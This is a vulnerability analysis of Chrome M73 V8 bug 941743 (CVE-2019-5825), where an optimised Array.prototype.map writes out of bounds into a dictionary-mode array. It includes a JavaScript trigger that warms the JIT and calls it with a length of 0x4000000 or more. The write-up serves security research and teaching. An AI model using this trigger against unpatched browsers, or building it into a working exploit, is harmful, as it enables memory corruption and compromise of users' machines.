# Chrome M73 issue 941743

## 3. bug analysis

1. The optimization of JSCreateArray (for |a2|) bails out at the typed-lowering phase, so the JITed code falls back to the generic allocation path, which ends up in |Runtime_NewArray|.
2. There is a CheckMaps on |arr|, but it only guarantees the map of |arr|; it says nothing about the elements kind of the new array |a2| that is produced from |arr|. For example, |arr| was extended by |push| and has PACKED_SMI_ELEMENTS, while |a2| is allocated by |Runtime_NewArray| and can end up with DICTIONARY_ELEMENTS.
3. TransitionAndStoreElement assumes the array it stores into (|a2|) starts out with HOLEY_SMI_ELEMENTS and only ever transitions to another fast (holey) elements kind. Nothing checks this either: when |Runtime_NewArray| is asked for a length >= 0x4000000 it allocates a dictionary elements backing store instead, and the fast-elements store then indexes that dictionary as if it were a FixedArray of |length| slots, writing out of bounds. That is the bug.
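The three conditions above, put together as an added illustration (this is not the page's own PoC). It assumes the lowered call site is Array.prototype.map, which is the JSCallReducer path that emits CheckMaps(|arr|), JSCreateArray(|a2|) and TransitionAndStoreElement; the page itself only names the nodes. The names (buildPackedSmiArray, mapIdentity, warmUp, checkMapResult) and the small lengths used for the self-check are mine; the 0x4000000 threshold is the page's. On a fixed engine the function returns a correct copy for any length; on a vulnerable M73 build, calling the JITed site with a receiver of length >= 0x4000000 is where the store goes past the dictionary backing store of |a2|.

```javascript
// Added example, not from the original analysis.
// Assumption: the affected lowering is Array.prototype.map (JSCallReducer),
// which emits CheckMaps(arr) + JSCreateArray(a2) + TransitionAndStoreElement.
// Threshold from the analysis: Runtime_NewArray gives DICTIONARY_ELEMENTS at >= 0x4000000.
const NORMALIZE_LENGTH = 0x4000000;

// Build the receiver the way the analysis describes: grown by push, so it keeps
// PACKED_SMI_ELEMENTS (all values are small integers, no holes).
function buildPackedSmiArray(n) {
  const arr = [];
  for (let i = 0; i < n; i++) arr.push(i);
  return arr;
}

// The map call site that TurboFan will lower. |a2| is created by JSCreateArray
// with arr.length, and each callback result is written via TransitionAndStoreElement.
function mapIdentity(arr) {
  return arr.map((x) => x);
}

// Warm the call site with small packed-SMI receivers so that TurboFan compiles
// mapIdentity with a CheckMaps on |arr| and the fast-elements store into |a2|.
function warmUp(iterations) {
  const small = buildPackedSmiArray(16);
  let sink = 0;
  for (let i = 0; i < iterations; i++) sink += mapIdentity(small)[3];
  return sink;
}

// Run the compiled call site on a receiver of length |len| and verify that |a2|
// really is an element-for-element copy of |arr|. Lengths >= NORMALIZE_LENGTH are the
// case the analysis describes (dictionary-mode |a2| written with a fast store);
// on a patched engine the result is still correct, on M73 it is memory corruption.
function checkMapResult(len) {
  warmUp(100000);
  const arr = buildPackedSmiArray(len);
  const a2 = mapIdentity(arr);
  if (!Array.isArray(a2) || a2.length !== arr.length) return false;
  const probes = [0, 1, len >> 1, len - 1];
  for (const i of probes) {
    if (a2[i] !== arr[i]) return false;
  }
  return true;
}

// Usage: checkMapResult(1 << 12) -> true on any engine;
// checkMapResult(NORMALIZE_LENGTH) needs ~1 GB of heap and is the trigger length
// from the analysis (do not run it in a sandboxed test runner).
```

To confirm the elements kinds the analysis talks about, run the same script in d8 or node with `--allow-natives-syntax` and `%DebugPrint(arr)` / `%DebugPrint(a2)` after the large call: the receiver shows PACKED_SMI_ELEMENTS and the result array shows DICTIONARY_ELEMENTS once the length crosses the threshold.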

issue-941743-cve-2019-5825

crbug-941743